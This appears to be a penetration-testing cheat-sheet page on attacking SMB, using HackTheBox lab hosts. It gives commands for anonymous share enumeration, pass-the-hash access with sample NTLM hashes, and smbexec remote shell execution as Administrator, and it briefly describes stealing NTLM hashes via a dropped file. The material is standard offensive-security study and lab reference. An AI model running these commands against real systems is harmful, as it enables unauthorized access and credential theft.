SMB
Null Session
smbmap:
smbmap -H querier.htb -u anonymous -d localhost
Use the -R flag to recursively list everything.
smbclient:
smbclient -L \querier.htb
Enter any password or supply the --no-pass
flag.
Pass The Hash
The NTLM hash of a user’s password is used in the NTLM challenge-response authentication protocol. Therefore, if you know the user’s NTLM hash, you can impersonate that user for services that rely on NTLM challenge-response.
Smbmap to enumerate an SMB share:
smbmap -u USERNAME -p 0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B -H HOST
Note: If you just have the NT hash, then you can just input the NT hash twice. No one really checks the LM hash anyways.
Execute commands over SMB (requires write permissions):
smbexec.py jeeves/Administrator@jeeves.htb -hashes "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00" -shell-type "powershell"
NTLM Hash Theft
If you have access to a network share, then you can drop a file in there that will result in a user's NTLM hash being stolen when they navigate to that share.
TODO: Link main article in post exploitation
Last updated
Was this helpful?